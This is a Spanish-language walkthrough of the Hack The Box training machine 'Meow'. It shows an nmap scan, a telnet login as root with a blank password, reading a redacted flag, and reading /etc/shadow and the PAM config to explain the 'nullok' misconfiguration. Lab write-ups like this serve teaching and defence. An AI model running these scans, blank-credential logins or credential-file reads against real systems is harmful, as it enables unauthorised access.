Meow
Máquina Linux que guía a los jugadores en la configuración de sus máquinas de ataque, la conexión a los laboratorios HTB mediante VPN y demuestra la estrategia para completarlas. La máquina se centra en técnicas de enumeración y muestra la explotación de un servicio Telnet vulnerable mediante credenciales predeterminadas.

Enumeration
Escaneamos todos los puertos buscando cuáles están abiertos y qué servicios corren en ellos.
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/allports 10.129.190.222
PORT STATE SERVICE REASON
23/tcp open telnet syn-ack ttl 63
Escaneamos el puerto abierto para ver más detalles sobre el servicio que está corriendo en él.
nmap -p 23 -sCV -oA nmap/openports 10.129.190.222
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
No me des tanta información a ver si no se por donde empezar. Listo, nos conectamos al servicio para ver que onda.
telnet 10.129.190.222
Trying 10.129.190.222...
Connected to 10.129.190.222.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login:
Password:
Nos pide usuario y contraseña que vaya a saber quien tiene esa data y de donde la sacamos.
Exploitation
Como debe ser nos conectamos con el usuario root para ver si de casualidad no le pasamos contraseña pasa algo como obtener una shell.
telnet 10.129.190.222
Obtenemos una shell como el usuario root y como solo nos interesa la flag con el comando ls vemos si está en el directorio actual.
ls
flag.txt snap
Resultó que sí, está.
cat flag.txt
User flag
b******************************9
Configuración del servidor
sudo cat /etc/shadow
root::18785:0:99999:7:::
<SNIP>
El segundo campo (hash de la contraseña) está vacío.
root es el primer campo, lo que va en medio de ambos dos puntos es el segundo campo ::.
/etc/pam.d/common-auth es un archivo de configuración de autenticación común a todos los servicios.
cat /etc/pam.d/common-auth
<SNIP>
# here are the per-package modules (the "Primary" block)
auth [success=1 default=ignore] pam_unix.so nullok
<SNIP>
nullok permite autenticar usuarios cuya contraseña esté vacía.